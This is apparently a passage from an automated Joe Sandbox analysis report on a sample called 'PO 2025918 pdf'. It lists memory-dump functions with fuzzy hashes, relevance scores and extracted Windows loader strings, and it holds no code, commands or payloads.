                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: #%u
                                                                                • API String ID: 48624451-232158463
                                                                                • Opcode ID: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                                                • Instruction ID: e8705d2c0352b8ae47edb28f9ccb1e0b4659c98297a5b0fe0d680097528df435
                                                                                • Opcode Fuzzy Hash: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                                                • Instruction Fuzzy Hash: 2A712772A0114A9FDB01DFA8CD94BAEB7F9FF08704F144069EA05A7251EB34AD41CBA4
                                                                                Function 0169A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • LdrResSearchResource Enter, xrefs: 0169AA13
                                                                                • LdrResSearchResource Exit, xrefs: 0169AA25
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                • API String ID: 0-4066393604
                                                                                • Opcode ID: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                                                • Instruction ID: 5c0f6e5504449c53e1bb4e5b66e8e07637531d21128b39801350924d258cd420
                                                                                • Opcode Fuzzy Hash: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                                                • Instruction Fuzzy Hash: 9EE16B71A01219ABEF22CEDDCD94BAEBBBEBB04314F10452AEA01E7355D778D941CB50
                                                                                Function 0175A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `$`
                                                                                • API String ID: 0-197956300
                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                • Instruction ID: d5c6a89dbab99935756f3c8ee699fa59f769881a405d87ff1edc16f4cd0950b3
                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                • Instruction Fuzzy Hash: EFC1CF312043429BEB65CE28C844B6BFBE5EFC4318F184A3DFA968B291D7B5D505CB91
                                                                                Function 0170E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Legacy$UEFI
                                                                                • API String ID: 2994545307-634100481
                                                                                • Opcode ID: fdaa9c75a270def354991789310987399072ae80e635758170382edf705699c2
                                                                                • Instruction ID: 7fe94029a7ef846abe1824286db86367884db8ed360f9f88746039f64132d331
                                                                                • Opcode Fuzzy Hash: fdaa9c75a270def354991789310987399072ae80e635758170382edf705699c2
                                                                                • Instruction Fuzzy Hash: AF613C71E44309DFDB15DFA88840AAEFBF9FB44704F14486EE649EB291DB31A940CB50
                                                                                Function 017343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$MUI
                                                                                • API String ID: 0-17815947
                                                                                • Opcode ID: d0fa7fe7be17ba7b448e8595b91a4e1ab2923f9d2306cffb70130ebf7399cffc
                                                                                • Instruction ID: 32ff261eea89696f0778cfeaf0fa097e1c69bde748ab4e43982d48875cc25d47
                                                                                • Opcode Fuzzy Hash: d0fa7fe7be17ba7b448e8595b91a4e1ab2923f9d2306cffb70130ebf7399cffc
                                                                                • Instruction Fuzzy Hash: 5E5136B1E0021DAFDF11DFA9CC90AEEBBBDEB44754F100529E612A7281D7349E05CBA4
                                                                                Function 016904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0169063D
                                                                                • kLsE, xrefs: 01690540
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                • API String ID: 0-2547482624
                                                                                • Opcode ID: 2c51eafffa95cfbbe49ab2be01db7683034bdb9888c7b3e90c5679f45a8bbfa7
                                                                                • Instruction ID: e5271b5c335340c6bdac605c278326cad85d43a1bbbe82bb7462350c3399b307
                                                                                • Opcode Fuzzy Hash: 2c51eafffa95cfbbe49ab2be01db7683034bdb9888c7b3e90c5679f45a8bbfa7
                                                                                • Instruction Fuzzy Hash: 1B51D1715047429FDB24DF68C9406A7BBEDAF85314F10883EFAAA87341E730E545CB92
                                                                                Function 0169A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0169A309
                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0169A2FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                • API String ID: 0-2876891731
                                                                                • Opcode ID: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
                                                                                • Instruction ID: e215eda1c13f9ac9ff06619fcd7edce7140ed81f6b1b1f8d4ddbde46112b7379
                                                                                • Opcode Fuzzy Hash: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
                                                                                • Instruction Fuzzy Hash: F9418B31A04649DBDF118F99CC50B6ABBF9BF84718F1440A9EA00DB395E3B5D901CB90
                                                                                Function 016CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                • API String ID: 2994545307-4008356553
                                                                                • Opcode ID: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
                                                                                • Instruction ID: 6f57c84641e6255b632f652371f3b3ef508ab1b84894c7864be05602f91e0041
                                                                                • Opcode Fuzzy Hash: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
                                                                                • Instruction Fuzzy Hash: AC01DCB2250788AFD321DF64CD46B2677E8EB84B29F00893DB649C7190E334E804CB4A
                                                                                Function 0169C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: MUI
                                                                                • API String ID: 0-1339004836
                                                                                • Opcode ID: 646bc1d98bc4b9da9c3e728e6a6e893ae09cf88d13ff6b6cb612d537f4e0df3a
                                                                                • Instruction ID: e6acdec57e2ff9309f2497ab6b64b27836711d64160e60d164f7b569e66f9fbb
                                                                                • Opcode Fuzzy Hash: 646bc1d98bc4b9da9c3e728e6a6e893ae09cf88d13ff6b6cb612d537f4e0df3a
                                                                                • Instruction Fuzzy Hash: 95825975E002198BEF25CFA9CD80BEDBBB9BF48710F14816AD919AB391D7309942CB54
                                                                                Function 01716420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 0ae6ddc5283042371fd9a6a987b3163f50a11f10332c96c1d8dab02f12e3d1d7
                                                                                • Instruction ID: 99c514e6b498341d65a64a2e6fe0893d61d9014735cbc7d3a247978eb79dab08
                                                                                • Opcode Fuzzy Hash: 0ae6ddc5283042371fd9a6a987b3163f50a11f10332c96c1d8dab02f12e3d1d7
                                                                                • Instruction Fuzzy Hash: AE917471A41219AFEB21DF99CC85FEEBBB9EF14B50F100069F601AB294D774AD40CB64
                                                                                Function 016CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: GlobalTags
                                                                                • API String ID: 0-1106856819
                                                                                • Opcode ID: cb7fa9e17b2945500c541e0719a2918986558a34ac69a8e87998cb6d3cb124d1
                                                                                • Instruction ID: c7485ab274482b87f0480684f5023679a3f787704a97ebf4403bc4913d701ed8
                                                                                • Opcode Fuzzy Hash: cb7fa9e17b2945500c541e0719a2918986558a34ac69a8e87998cb6d3cb124d1
                                                                                • Instruction Fuzzy Hash: 33716DB5E0031ADBDF29CF98C9A06ADBBF2BF48710F14816EF505A7281E7319951CB64
                                                                                Function 01734978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .mui
                                                                                • API String ID: 0-1199573805
                                                                                • Opcode ID: 8641760a6529934546ee19808d51ed8b1755c39242d1677a94fc48c8e6961ecf
                                                                                • Instruction ID: 7e1fe8e82f5d023a15e5252ff714aec25215a5ab47a39b07ebec5f45e48fafb8
                                                                                • Opcode Fuzzy Hash: 8641760a6529934546ee19808d51ed8b1755c39242d1677a94fc48c8e6961ecf
                                                                                • Instruction Fuzzy Hash: 4151B572D0022A9BDF18DF99D840AAEFBB9BF44650F05416DE912BB211D3349D02CBE4
                                                                                Function 016AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: EXT-
                                                                                • API String ID: 0-1948896318
                                                                                • Opcode ID: 36eda19c6d0edf23a0a4efccbcbc7b49f1072f59efc210e64c820fb902067950
                                                                                • Instruction ID: a81502238cdc4f675fd56692388ff7a6ac662299510086bbc1964183cd1efcde
                                                                                • Opcode Fuzzy Hash: 36eda19c6d0edf23a0a4efccbcbc7b49f1072f59efc210e64c820fb902067950
                                                                                • Instruction Fuzzy Hash: 1F41A172508312ABD710DA79CD80B6BBBE9AF88714F84092DFA85D7240E775DD04CBA7
                                                                                Function 0168CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: AlternateCodePage
                                                                                • API String ID: 0-3889302423
                                                                                • Opcode ID: c67082f76f02dc17017a639a3eb3a6854cf348288148c53e6b3c23b119192252
                                                                                • Instruction ID: 3f9558d5ee69d772cf717f6ae9807afc637b0ed511c6ea3ee9f90a9652e3b7ec
                                                                                • Opcode Fuzzy Hash: c67082f76f02dc17017a639a3eb3a6854cf348288148c53e6b3c23b119192252
                                                                                • Instruction Fuzzy Hash: A541B076D01219AAEF25EB98CC84AEEBBF9FF44610F14425EE512E7250D7709A41CB60
                                                                                Function 0170C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryHash
                                                                                • API String ID: 0-2202222882
                                                                                • Opcode ID: a89a2e53a9779c3a55b41baa5727377a450232f0cafb4dd3ae6bc9e043c8a664
                                                                                • Instruction ID: d8476b6733601dacf805ce9b472d25a00c970d2d8f4325f42fc6e1b9707522cd
                                                                                • Opcode Fuzzy Hash: a89a2e53a9779c3a55b41baa5727377a450232f0cafb4dd3ae6bc9e043c8a664
                                                                                • Instruction Fuzzy Hash: BE4148B1D4162DEBDB22DA50CC84FDEB77DAB45714F0045E9A708A7180DB709E498F98
                                                                                Function 01726B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                • Opcode ID: 25642b00a23b59ac94351eaf08f4676d7e20e1c7a56597290f776fb2ca952093
                                                                                • Instruction ID: fcf4476592b2f00bafcf701cd71d22c90361e7e8eac96f6bd239fbedcf4ac9ed
                                                                                • Opcode Fuzzy Hash: 25642b00a23b59ac94351eaf08f4676d7e20e1c7a56597290f776fb2ca952093
                                                                                • Instruction Fuzzy Hash: 68311A31E007699BDB22EB69CC50BAEFBA9DF04704F54406AFD41AB282C775EC46CB54
                                                                                Function 0170CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryName
                                                                                • API String ID: 0-215506332
                                                                                • Opcode ID: 9e738dab6f05ead95455da2d533c8db33272acb59ccaa1df48bb56dad9687717
                                                                                • Instruction ID: 1f92b5fa85ae3d61aea8cf0fe846ed89b81444d853a9b26f3f6d8be9b61b97d8
                                                                                • Opcode Fuzzy Hash: 9e738dab6f05ead95455da2d533c8db33272acb59ccaa1df48bb56dad9687717
                                                                                • Instruction Fuzzy Hash: 60310576900A15EFEB17DA58C851E6FFBB5EB80710F0142A9AA01A7290D730DE00EBE0
                                                                                Function 0171892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0171895E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                • API String ID: 0-702105204
                                                                                • Opcode ID: c316a3195a72910c62ff5561a27a92a1f673553034b6a7e3365a5610df43ec6a
                                                                                • Instruction ID: c870ebfc722b7303fc1ca0583a9038838c4fefd13b4ea899643450ec9e82c9b9
                                                                                • Opcode Fuzzy Hash: c316a3195a72910c62ff5561a27a92a1f673553034b6a7e3365a5610df43ec6a
                                                                                • Instruction Fuzzy Hash: 0A012B723442019BE7206F5DCC84A6AFF67EF81A64B14042CF7810A159CF206881C797
                                                                                Function 01732000 Relevance: .8, Instructions: 757COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 01a3154353f73855eb58bfd85d7c3bab180c9c4d6131cf4f5248402fa281fe5c
                                                                                • Instruction ID: 07a981f79cdda1011bbc6bf05090e4dd23ac7c4f96512cee0a8b01670d7c7313
                                                                                • Opcode Fuzzy Hash: 01a3154353f73855eb58bfd85d7c3bab180c9c4d6131cf4f5248402fa281fe5c
                                                                                • Instruction Fuzzy Hash: 4442CF326083419BE725CF68C890A6BFBE6BFC8700F58492DFA8297253D771D945CB52
                                                                                Function 01728158 Relevance: .6, Instructions: 617COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
                                                                                • Instruction ID: eb7ea401c292e5d96abec1ecd89a44649dcca506fe11d6ed7a5c21868e25cef0
                                                                                • Opcode Fuzzy Hash: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
                                                                                • Instruction Fuzzy Hash: D9425C75E102298FEB24CF69CC81BADFBF6BF48300F148199E949AB242D7359985CF51
                                                                                Function 016A2840 Relevance: .6, Instructions: 605COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 716da21fb7022a68770f50926b5772d03fe8e2cd2613bb9187ee7ba392aa3902
                                                                                • Instruction ID: 78231c954e35183cf2df6a6ca231945e1cdee427cae5914b82657034884434df
                                                                                • Opcode Fuzzy Hash: 716da21fb7022a68770f50926b5772d03fe8e2cd2613bb9187ee7ba392aa3902
                                                                                • Instruction Fuzzy Hash: C232BB70A007568BEB25CF69CC587BEBBF2BF84704F24811DE6969B385D735A842CB50
                                                                                Function 0173A118 Relevance: .6, Instructions: 591COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b0c3f36e4fdf9a384d756abd55b0a3d40f698102ff53c4a86216723402194b00
                                                                                • Instruction ID: 05cc3639b88b8c6013c042b7811a76be687ceff7fcfc439562031383907c3bd0
                                                                                • Opcode Fuzzy Hash: b0c3f36e4fdf9a384d756abd55b0a3d40f698102ff53c4a86216723402194b00
                                                                                • Instruction Fuzzy Hash: 8F22A9702046618AEB25CF2DC096772FBF1AFC5300F18849AE9D6CB287E735E452DB61
                                                                                Function 01696A50 Relevance: .5, Instructions: 548COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b046ce1ff8723df663ac2d264a9a2b8aecb027ffbba473e333ef34391e725ff9
                                                                                • Instruction ID: b126ff84f776f108e85f3fbe08c6f0c9232d9f05b27943101bb1e0d1f8a611f6
                                                                                • Opcode Fuzzy Hash: b046ce1ff8723df663ac2d264a9a2b8aecb027ffbba473e333ef34391e725ff9
                                                                                • Instruction Fuzzy Hash: D7327C71A05205CFDB25CFA8C880AAABBF6FF48310F14856EEA55AB355D734E846CB50
                                                                                Function 016B4A35 Relevance: .4, Instructions: 423COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                • Instruction ID: 78155a078b755f1654daebe411956c2228b72904d2ddd1ac8a8e4a39314ea181
                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                • Instruction Fuzzy Hash: 14F15071E0021A9BDB15CF99CD90BEEBBF5AF48710F09816DEA06AB345DB74D881CB50
                                                                                Function 0172892B Relevance: .4, Instructions: 386COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: facfbd87e2b9901a66b0fcb69a10708709f9a08a26b9821dd2d086dd89bcc30b
                                                                                • Instruction ID: 87f254a942d51f1aa6427d7ca80d9cb9704a5ba4145d844a5c237f3c176ea6bc
                                                                                • Opcode Fuzzy Hash: facfbd87e2b9901a66b0fcb69a10708709f9a08a26b9821dd2d086dd89bcc30b
                                                                                • Instruction Fuzzy Hash: E3D1F471E0062A8BDF15CF58C841AFEF7F2BF88304F18816AD955A7241D736EA06CB61
                                                                                Function 016965D0 Relevance: .4, Instructions: 383COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a8e11d41b8eb0deee4357c447960e2e7193bb0b7e0c2fbe9d68cc00d3dceae7
                                                                                • Instruction ID: 938e003fd4d50e21acef1162a2e3f764fd41e1b8c9aca44245e9b3813f5af6c7
                                                                                • Opcode Fuzzy Hash: 9a8e11d41b8eb0deee4357c447960e2e7193bb0b7e0c2fbe9d68cc00d3dceae7
                                                                                • Instruction Fuzzy Hash: 7FE1B271508342CFCB15CF28C890A6ABBE5FF89318F05896DF9998B351DB31E905CB92
                                                                                Function 01688397 Relevance: .4, Instructions: 380COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
                                                                                • Instruction ID: a977f82538e94beac437046ad7ca2afede44b5861f6f84238365efa965831959
                                                                                • Opcode Fuzzy Hash: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
                                                                                • Instruction Fuzzy Hash: 69D1F272A012169BDB14EF68CC90ABEB7FABF54304F45472DE916DB280E734E951CB60
                                                                                Function 01718243 Relevance: .3, Instructions: 322COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                • Instruction ID: 42bbf4d7972eb4ad8a33087d2cb690492322df1e4354e677e7f2afcda986a125
                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                • Instruction Fuzzy Hash: 6AB19075A00605AFDB25DF9CC940FABFBBAFF84304F14456DAA02A7798DA34E905CB11
                                                                                Function 016A0535 Relevance: .3, Instructions: 300COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                • Instruction ID: d51a2497c24c70de87323d9abca5387e782b1847319a997363337a12526d142c
                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                • Instruction Fuzzy Hash: 89B1F271600646AFDB25DBACCD50BBEBBF6AF84304F540199E6969B381DB30ED41CB90
                                                                                Function 016B0DE1 Relevance: .3, Instructions: 295COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
